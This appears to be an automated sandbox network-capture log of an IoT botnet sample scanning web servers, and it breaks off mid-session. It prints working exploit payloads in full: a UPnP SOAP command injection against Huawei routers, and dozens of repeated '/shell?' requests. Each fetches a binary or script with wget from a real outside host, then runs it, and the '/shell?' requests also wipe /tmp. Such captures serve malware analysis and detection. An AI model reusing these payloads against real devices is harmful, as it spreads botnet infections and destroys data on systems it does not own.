                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          255192.168.2.2342602198.44.248.10480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.798165083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:28.125873089 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:27:07 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          256192.168.2.2350982144.126.206.15780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:28.177953005 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          257192.168.2.234079686.181.28.25280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:28.186813116 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          258192.168.2.2353078104.69.218.3480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.590605021 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:30.747637033 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:30 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:30 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 65 62 65 66 37 34 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 37 30 26 23 34 36 3b 63 37 65 37 33 30 65 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5ebef748&#46;1704173070&#46;c7e730ec</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          259192.168.2.2350120104.230.152.22580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.618083954 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:30.792844057 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:31.670048952 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:32.722330093 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:34.830550909 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:39.038703918 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close
                                                          Jan 2, 2024 06:24:47.470043898 CET198INHTTP/1.1 400 Bad Request
                                                          Content-type: text/html
                                                          Content-Length: 0
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          260192.168.2.233534875.187.170.24080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.620215893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          261192.168.2.2358122198.204.78.11580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.686985016 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          262192.168.2.2358690104.21.5.8880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.711854935 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          263192.168.2.2349236172.67.227.680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.712224960 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          264192.168.2.234043038.173.201.9180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.753563881 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:30.917543888 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 13:21:23 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          265192.168.2.234739634.18.64.5480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.779179096 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:31.131489038 CET570INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:30 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Content-Length: 376
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 68 65 61 6c 74 68 79 2d 62 61 63 6b 65 6e 64 2d 72 70 2d 77 61 74 63 68 2d 6d 65 2d 63 31 2d 63 2e 6d 65 2d 63 65 6e 74 72 61 6c 31 2d 63 2e 63 2e 64 6e 73 2d 72 70 2d 6d 65 74 61 73 74 6f 72 65 2d 77 61 74 63 68 2d 63 65 70 2e 69 6e 74 65 72 6e 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at healthy-backend-rp-watch-me-c1-c.me-central1-c.c.dns-rp-metastore-watch-cep.internal Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          266192.168.2.236056227.54.141.22480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.783293009 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:31.136926889 CET181INHTTP/1.0 400 Bad request
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                          Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          267192.168.2.2353436103.50.160.13980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.812927008 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:31.216288090 CET525INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:31 GMT
                                                          Server: Apache
                                                          Content-Length: 347
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          268192.168.2.2354834123.1.253.23680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.849841118 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:33.004086971 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:35.723697901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:40.842974901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:51.081635952 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:13.350415945 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          269192.168.2.2343476168.93.163.14680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.901527882 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:31.055830956 CET911INHTTP/1.0 404 Not Found
                                                          Server: SonicWALL
                                                          Expires: -1
                                                          Cache-Control: no-cache
                                                          Content-type: text/html;charset=UTF-8
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 73 68 65 6c 6c 3f 63 64 20 26 23 78 32 46 3b 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;shell?cd &#x2F;tmp;rm -rf *;wget </span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          270192.168.2.234882435.211.249.21180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:30.918981075 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:31.084160089 CET322INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:31 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          271192.168.2.235388223.37.171.10480
                                                          TimestampBytes transferredDirectionData
